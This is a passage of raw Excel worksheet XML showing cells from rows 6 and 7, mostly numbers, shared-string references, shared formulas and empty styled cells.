      <c r="ED6" s="109">
        <v>5.0</v>
      </c>
      <c r="EE6" s="109">
        <v>10.0</v>
      </c>
      <c r="EF6" s="109">
        <v>1.0</v>
      </c>
      <c r="EG6" s="109">
        <v>12.0</v>
      </c>
      <c r="EH6" s="109">
        <v>13.0</v>
      </c>
      <c r="EI6" s="109">
        <v>2.0</v>
      </c>
      <c r="EJ6" s="109">
        <v>0.0</v>
      </c>
      <c r="EK6" s="109">
        <v>2.0</v>
      </c>
      <c r="EL6" s="109">
        <v>2.0</v>
      </c>
      <c r="EM6" s="109">
        <v>5.0</v>
      </c>
      <c r="EN6" s="109">
        <v>10.0</v>
      </c>
      <c r="EO6" s="109">
        <v>1.0</v>
      </c>
      <c r="EP6" s="109">
        <v>12.0</v>
      </c>
      <c r="EQ6" s="109">
        <v>13.0</v>
      </c>
      <c r="ER6" s="110">
        <f t="shared" si="27"/>
        <v>2.5</v>
      </c>
      <c r="ES6" s="110">
        <f t="shared" si="28"/>
        <v>2.5</v>
      </c>
      <c r="ET6" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU6" s="110">
        <f t="shared" si="30"/>
        <v>5</v>
      </c>
      <c r="EV6" s="110">
        <f t="shared" si="31"/>
        <v>5</v>
      </c>
      <c r="EW6" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX6" s="110">
        <f t="shared" si="33"/>
        <v>6.5</v>
      </c>
      <c r="EY6" s="110">
        <f t="shared" si="34"/>
        <v>6.5</v>
      </c>
      <c r="EZ6" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA6" s="110">
        <f t="shared" si="36"/>
        <v>0.6666666667</v>
      </c>
      <c r="FB6" s="110">
        <f t="shared" si="37"/>
        <v>1</v>
      </c>
      <c r="FC6" s="111" t="s">
        <v>280</v>
      </c>
      <c r="FD6" s="111">
        <v>9.0</v>
      </c>
      <c r="FE6" s="111">
        <v>38.0</v>
      </c>
      <c r="FF6" s="101" t="s">
        <v>281</v>
      </c>
      <c r="FG6" s="111" t="s">
        <v>282</v>
      </c>
      <c r="FH6" s="111">
        <v>6.0</v>
      </c>
      <c r="FI6" s="111">
        <v>15.0</v>
      </c>
      <c r="FJ6" s="111" t="s">
        <v>283</v>
      </c>
      <c r="FK6" s="111" t="s">
        <v>281</v>
      </c>
      <c r="FL6" s="111" t="str">
        <f t="shared" si="38"/>
        <v>44489, 2002752, 2002749, 2101620, 2044666, 2051116</v>
      </c>
      <c r="FM6" s="111" t="s">
        <v>284</v>
      </c>
      <c r="FN6" s="111" t="s">
        <v>285</v>
      </c>
      <c r="FO6" s="111" t="s">
        <v>286</v>
      </c>
      <c r="FP6" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ6" s="111">
        <v>3.0</v>
      </c>
      <c r="FR6" s="111">
        <v>8.0</v>
      </c>
      <c r="FS6" s="112">
        <v>6.0</v>
      </c>
      <c r="FT6" s="112">
        <v>6.0</v>
      </c>
      <c r="FU6" s="112">
        <v>14.0</v>
      </c>
      <c r="FV6" s="112">
        <v>1.0</v>
      </c>
      <c r="FW6" s="112">
        <v>37.0</v>
      </c>
      <c r="FX6" s="112">
        <v>38.0</v>
      </c>
      <c r="FY6" s="112">
        <v>2.0</v>
      </c>
      <c r="FZ6" s="112">
        <v>0.0</v>
      </c>
      <c r="GA6" s="112">
        <v>2.0</v>
      </c>
      <c r="GB6" s="112">
        <v>2.0</v>
      </c>
      <c r="GC6" s="112">
        <v>6.0</v>
      </c>
      <c r="GD6" s="112">
        <v>11.0</v>
      </c>
      <c r="GE6" s="112">
        <v>1.0</v>
      </c>
      <c r="GF6" s="112">
        <v>14.0</v>
      </c>
      <c r="GG6" s="112">
        <v>15.0</v>
      </c>
      <c r="GH6" s="113">
        <f t="shared" si="39"/>
        <v>3</v>
      </c>
      <c r="GI6" s="113">
        <f t="shared" si="40"/>
        <v>3</v>
      </c>
      <c r="GJ6" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK6" s="113">
        <f t="shared" si="42"/>
        <v>7</v>
      </c>
      <c r="GL6" s="113">
        <f t="shared" si="43"/>
        <v>5.5</v>
      </c>
      <c r="GM6" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN6" s="113">
        <f t="shared" si="45"/>
        <v>19</v>
      </c>
      <c r="GO6" s="113">
        <f t="shared" si="46"/>
        <v>7.5</v>
      </c>
      <c r="GP6" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ6" s="114">
        <f t="shared" si="48"/>
        <v>0.6666666667</v>
      </c>
      <c r="GR6" s="113">
        <f t="shared" si="49"/>
        <v>1</v>
      </c>
      <c r="GS6" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT6" s="94" t="s">
        <v>287</v>
      </c>
      <c r="GU6" s="130">
        <v>52169.0</v>
      </c>
      <c r="GV6" s="116">
        <v>1.0</v>
      </c>
      <c r="GW6" s="116">
        <v>18.0</v>
      </c>
      <c r="GX6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD6" s="131">
        <v>52169.0</v>
      </c>
      <c r="HE6" s="131">
        <v>52169.0</v>
      </c>
      <c r="HF6" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG6" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH6" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI6" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ6" s="93" t="s">
        <v>288</v>
      </c>
      <c r="HK6" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL6" s="93">
        <v>2.0</v>
      </c>
      <c r="HM6" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN6" s="93">
        <v>0.0</v>
      </c>
      <c r="HO6" s="93">
        <v>0.0</v>
      </c>
      <c r="HP6" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ6" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR6" s="118">
        <f t="shared" si="54"/>
        <v>0.3333333333</v>
      </c>
      <c r="HS6" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT6" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU6" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV6" s="119" t="s">
        <v>289</v>
      </c>
      <c r="HW6" s="119">
        <v>3.0</v>
      </c>
      <c r="HX6" s="119">
        <v>15.0</v>
      </c>
      <c r="HY6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC6" s="120" t="s">
        <v>290</v>
      </c>
      <c r="ID6" s="120">
        <v>85585.0</v>
      </c>
      <c r="IE6" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF6" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH6" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II6" s="99" t="s">
        <v>291</v>
      </c>
      <c r="IJ6" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK6" s="99">
        <v>5.0</v>
      </c>
      <c r="IL6" s="99">
        <v>0.0</v>
      </c>
      <c r="IM6" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN6" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO6" s="98">
        <v>3.0</v>
      </c>
      <c r="IP6" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ6" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR6" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS6" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT6" s="127"/>
      <c r="IU6" s="127"/>
      <c r="IV6" s="127"/>
      <c r="IW6" s="127"/>
      <c r="IX6" s="127"/>
      <c r="IY6" s="127"/>
      <c r="IZ6" s="127"/>
      <c r="JA6" s="127"/>
      <c r="JB6" s="127"/>
      <c r="JC6" s="127"/>
      <c r="JD6" s="127"/>
      <c r="JE6" s="127"/>
      <c r="JF6" s="127"/>
      <c r="JG6" s="127"/>
      <c r="JH6" s="127"/>
      <c r="JI6" s="127"/>
      <c r="JJ6" s="127"/>
      <c r="JK6" s="127"/>
      <c r="JL6" s="127"/>
      <c r="JM6" s="127"/>
      <c r="JN6" s="127"/>
      <c r="JO6" s="127"/>
      <c r="JP6" s="127"/>
      <c r="JQ6" s="127"/>
      <c r="JR6" s="127"/>
      <c r="JS6" s="127"/>
      <c r="JT6" s="127"/>
      <c r="JU6" s="127"/>
      <c r="JV6" s="127"/>
      <c r="JW6" s="127"/>
      <c r="JX6" s="127"/>
      <c r="JY6" s="127"/>
      <c r="JZ6" s="127"/>
      <c r="KA6" s="127"/>
      <c r="KB6" s="127"/>
      <c r="KC6" s="127"/>
      <c r="KD6" s="127"/>
      <c r="KE6" s="127"/>
      <c r="KF6" s="127"/>
      <c r="KG6" s="127"/>
      <c r="KH6" s="127"/>
      <c r="KI6" s="127"/>
      <c r="KJ6" s="127"/>
      <c r="KK6" s="127"/>
      <c r="KL6" s="127"/>
      <c r="KM6" s="127"/>
      <c r="KN6" s="127"/>
      <c r="KO6" s="127"/>
      <c r="KP6" s="127"/>
      <c r="KQ6" s="127"/>
      <c r="KR6" s="127"/>
      <c r="KS6" s="127"/>
      <c r="KT6" s="127"/>
      <c r="KU6" s="127"/>
      <c r="KV6" s="127"/>
      <c r="KW6" s="127"/>
      <c r="KX6" s="127"/>
      <c r="KY6" s="127"/>
      <c r="KZ6" s="127"/>
      <c r="LA6" s="127"/>
      <c r="LB6" s="127"/>
      <c r="LC6" s="127"/>
      <c r="LD6" s="127"/>
      <c r="LE6" s="127"/>
      <c r="LF6" s="127"/>
      <c r="LG6" s="127"/>
      <c r="LH6" s="127"/>
      <c r="LI6" s="127"/>
      <c r="LJ6" s="127"/>
      <c r="LK6" s="127"/>
      <c r="LL6" s="127"/>
      <c r="LM6" s="127"/>
      <c r="LN6" s="127"/>
      <c r="LO6" s="127"/>
      <c r="LP6" s="127"/>
      <c r="LQ6" s="127"/>
      <c r="LR6" s="127"/>
      <c r="LS6" s="127"/>
      <c r="LT6" s="127"/>
      <c r="LU6" s="127"/>
      <c r="LV6" s="127"/>
      <c r="LW6" s="127"/>
      <c r="LX6" s="127"/>
      <c r="LY6" s="127"/>
      <c r="LZ6" s="127"/>
      <c r="MA6" s="127"/>
      <c r="MB6" s="127"/>
      <c r="MC6" s="127"/>
      <c r="MD6" s="127"/>
      <c r="ME6" s="127"/>
      <c r="MF6" s="127"/>
      <c r="MG6" s="127"/>
      <c r="MH6" s="127"/>
      <c r="MI6" s="127"/>
      <c r="MJ6" s="127"/>
      <c r="MK6" s="127"/>
      <c r="ML6" s="127"/>
      <c r="MM6" s="127"/>
      <c r="MN6" s="127"/>
      <c r="MO6" s="127"/>
      <c r="MP6" s="127"/>
      <c r="MQ6" s="127"/>
      <c r="MR6" s="127"/>
      <c r="MS6" s="127"/>
      <c r="MT6" s="127"/>
      <c r="MU6" s="127"/>
      <c r="MV6" s="127"/>
      <c r="MW6" s="127"/>
      <c r="MX6" s="127"/>
      <c r="MY6" s="127"/>
      <c r="MZ6" s="127"/>
      <c r="NA6" s="127"/>
      <c r="NB6" s="127"/>
      <c r="NC6" s="127"/>
      <c r="ND6" s="127"/>
      <c r="NE6" s="127"/>
      <c r="NF6" s="127"/>
      <c r="NG6" s="127"/>
      <c r="NH6" s="127"/>
      <c r="NI6" s="127"/>
      <c r="NJ6" s="127"/>
      <c r="NK6" s="127"/>
      <c r="NL6" s="127"/>
      <c r="NM6" s="127"/>
      <c r="NN6" s="127"/>
      <c r="NO6" s="127"/>
      <c r="NP6" s="127"/>
      <c r="NQ6" s="127"/>
      <c r="NR6" s="127"/>
      <c r="NS6" s="127"/>
      <c r="NT6" s="127"/>
      <c r="NU6" s="127"/>
      <c r="NV6" s="127"/>
      <c r="NW6" s="127"/>
      <c r="NX6" s="127"/>
      <c r="NY6" s="127"/>
    </row>
    <row r="7" ht="107.25" customHeight="1">
      <c r="B7" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C7" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D7" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E7" s="90" t="s">
        <v>294</v>
      </c>
      <c r="F7" s="90" t="s">
        <v>295</v>
      </c>
      <c r="G7" s="91" t="s">
        <v>296</v>
      </c>
      <c r="H7" s="90" t="s">
        <v>297</v>
      </c>
      <c r="I7" s="92" t="s">
        <v>298</v>
      </c>
      <c r="J7" s="92" t="s">
        <v>299</v>
      </c>
      <c r="K7" s="92" t="s">
        <v>300</v>
      </c>
      <c r="L7" s="93" t="s">
        <v>301</v>
      </c>
      <c r="M7" s="93">
        <v>1.0</v>
      </c>
      <c r="N7" s="93">
        <v>1.0</v>
      </c>
      <c r="O7" s="93">
        <v>0.0</v>
      </c>
      <c r="P7" s="93">
        <v>1.0</v>
      </c>
      <c r="Q7" s="93">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R7" s="93">
        <v>1.0</v>
      </c>
      <c r="S7" s="93">
        <v>0.0</v>
      </c>
      <c r="T7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U7" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V7" s="96" t="s">
        <v>302</v>
      </c>
      <c r="W7" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X7" s="97" t="s">
        <v>303</v>
      </c>
      <c r="Y7" s="96" t="s">
        <v>304</v>
      </c>
      <c r="Z7" s="96" t="s">
        <v>305</v>
      </c>
      <c r="AA7" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB7" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC7" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD7" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE7" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AF7" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG7" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH7" s="99" t="s">
        <v>307</v>
      </c>
      <c r="AI7" s="99" t="s">
        <v>308</v>
      </c>
      <c r="AJ7" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL7" s="100">
        <v>0.0</v>
      </c>
      <c r="AM7" s="100">
        <v>0.0</v>
      </c>
      <c r="AN7" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP7" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ7" s="100">
        <v>0.0</v>
      </c>
      <c r="AR7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT7" s="100" t="str">
        <f t="shared" si="2"/>
        <v>-</v>
      </c>
      <c r="AU7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX7" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY7" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ7" s="100">
        <v>0.0</v>
      </c>
      <c r="BA7" s="102">
        <v>1.0</v>
      </c>
      <c r="BB7" s="102">
        <v>0.0</v>
      </c>
      <c r="BC7" s="102">
        <v>0.0</v>
      </c>
      <c r="BD7" s="102">
        <v>0.0</v>
      </c>
      <c r="BE7" s="102">
        <v>0.0</v>
      </c>
      <c r="BF7" s="102">
        <v>0.0</v>
      </c>
      <c r="BG7" s="102">
        <v>0.0</v>
      </c>
      <c r="BH7" s="102">
        <v>0.0</v>
      </c>
      <c r="BI7" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ7" s="102">
        <v>0.0</v>
      </c>
      <c r="BK7" s="102">
        <v>0.0</v>
      </c>
      <c r="BL7" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM7" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN7" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO7" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP7" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ7" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR7" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS7" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT7" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU7" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV7" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX7" s="104">
        <v>0.0</v>
      </c>
      <c r="BY7" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ7" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB7" s="104">
        <v>0.0</v>
      </c>
      <c r="CC7" s="104">
        <v>0.0</v>
      </c>
      <c r="CD7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF7" s="104" t="str">
        <f t="shared" si="14"/>
        <v>-</v>
      </c>
      <c r="CG7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ7" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK7" s="104">
        <v>0.0</v>
      </c>
      <c r="CL7" s="104">
        <v>0.0</v>
      </c>
      <c r="CM7" s="105">
        <v>1.0</v>
      </c>
      <c r="CN7" s="105">
        <v>0.0</v>
      </c>
      <c r="CO7" s="105">
        <v>0.0</v>
      </c>
      <c r="CP7" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ7" s="105">
        <v>0.0</v>
      </c>
      <c r="CR7" s="105">
        <v>0.0</v>
      </c>
      <c r="CS7" s="105">
        <v>0.0</v>
      </c>
      <c r="CT7" s="105">
        <v>0.0</v>
      </c>
      <c r="CU7" s="105">
        <v>0.0</v>
      </c>
      <c r="CV7" s="105">
        <v>0.0</v>
      </c>
      <c r="CW7" s="105">
        <v>0.0</v>
      </c>
      <c r="CX7" s="105">
        <v>0.0</v>
      </c>
      <c r="CY7" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ7" s="105">
        <v>0.0</v>
      </c>
      <c r="DA7" s="105">
        <v>0.0</v>
      </c>
      <c r="DB7" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC7" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD7" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE7" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF7" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG7" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH7" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI7" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ7" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK7" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL7" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN7" s="108">
        <v>0.0</v>
      </c>
      <c r="DO7" s="108">
        <v>0.0</v>
      </c>
      <c r="DP7" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR7" s="108">
        <v>0.0</v>
      </c>
      <c r="DS7" s="108">
        <v>0.0</v>
      </c>
      <c r="DT7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ7" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA7" s="108">
        <v>0.0</v>
      </c>
      <c r="EB7" s="108">
        <v>0.0</v>
      </c>
      <c r="EC7" s="109">
        <v>1.0</v>
      </c>
      <c r="ED7" s="109">
        <v>0.0</v>
      </c>
      <c r="EE7" s="109">
        <v>0.0</v>
      </c>
      <c r="EF7" s="109">
        <v>0.0</v>
      </c>
      <c r="EG7" s="109">
        <v>0.0</v>
      </c>
      <c r="EH7" s="109">
        <v>0.0</v>
      </c>
      <c r="EI7" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ7" s="109">
        <v>0.0</v>
      </c>
      <c r="EK7" s="109">
        <v>0.0</v>
      </c>
      <c r="EL7" s="109">
        <v>0.0</v>
      </c>
      <c r="EM7" s="109">
        <v>0.0</v>
      </c>
      <c r="EN7" s="109">
        <v>0.0</v>
      </c>
      <c r="EO7" s="109">
        <v>0.0</v>
      </c>
      <c r="EP7" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ7" s="109">
        <v>0.0</v>
      </c>
      <c r="ER7" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES7" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET7" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU7" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV7" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW7" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX7" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY7" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ7" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA7" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB7" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FD7" s="111">
        <v>0.0</v>
      </c>
      <c r="FE7" s="111">
        <v>0.0</v>
      </c>
      <c r="FF7" s="101" t="s">
        <v>12</v>
      </c>
      <c r="FG7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH7" s="111">
        <v>0.0</v>
      </c>
      <c r="FI7" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FM7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP7" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ7" s="111">
        <v>0.0</v>
      </c>
      <c r="FR7" s="111">
        <v>0.0</v>
      </c>
      <c r="FS7" s="112">
        <v>1.0</v>
      </c>
      <c r="FT7" s="112">
        <v>0.0</v>
      </c>
      <c r="FU7" s="112">
        <v>0.0</v>
      </c>
      <c r="FV7" s="112">
        <v>0.0</v>
      </c>
      <c r="FW7" s="112">
        <v>0.0</v>
      </c>
      <c r="FX7" s="112">
        <v>0.0</v>
      </c>
      <c r="FY7" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ7" s="112">
        <v>0.0</v>
      </c>
      <c r="GA7" s="112">
        <v>0.0</v>
      </c>
      <c r="GB7" s="112">
        <v>0.0</v>
      </c>
      <c r="GC7" s="112">
        <v>0.0</v>
      </c>
      <c r="GD7" s="112">
        <v>0.0</v>
      </c>
      <c r="GE7" s="112">
        <v>0.0</v>
      </c>
      <c r="GF7" s="112">
        <v>0.0</v>
      </c>
      <c r="GG7" s="112">
        <v>0.0</v>
      </c>
      <c r="GH7" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI7" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ7" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK7" s="113">
        <f t="shared" si="42"/>
        <v>0</v>
      </c>
      <c r="GL7" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM7" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN7" s="113">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="GO7" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP7" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ7" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR7" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS7" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT7" s="94"/>
      <c r="GU7" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV7" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW7" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF7" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG7" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH7" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI7" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ7" s="93" t="s">
        <v>309</v>
      </c>
      <c r="HK7" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL7" s="93">
        <v>0.0</v>
      </c>
      <c r="HM7" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN7" s="93">
        <v>0.0</v>
      </c>
      <c r="HO7" s="93">
        <v>0.0</v>
      </c>
      <c r="HP7" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ7" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR7" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS7" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT7" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU7" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV7" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW7" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX7" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC7" s="120" t="str">
        <f t="shared" ref="IC7:IC10" si="61">HV7</f>
        <v>-</v>
      </c>
      <c r="ID7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH7" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II7" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ7" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK7" s="99">
        <v>0.0</v>
      </c>
      <c r="IL7" s="99">
        <v>0.0</v>
      </c>
      <c r="IM7" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN7" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO7" s="98">
        <v>0.0</v>
      </c>
      <c r="IP7" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ7" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR7" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS7" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT7" s="127"/>
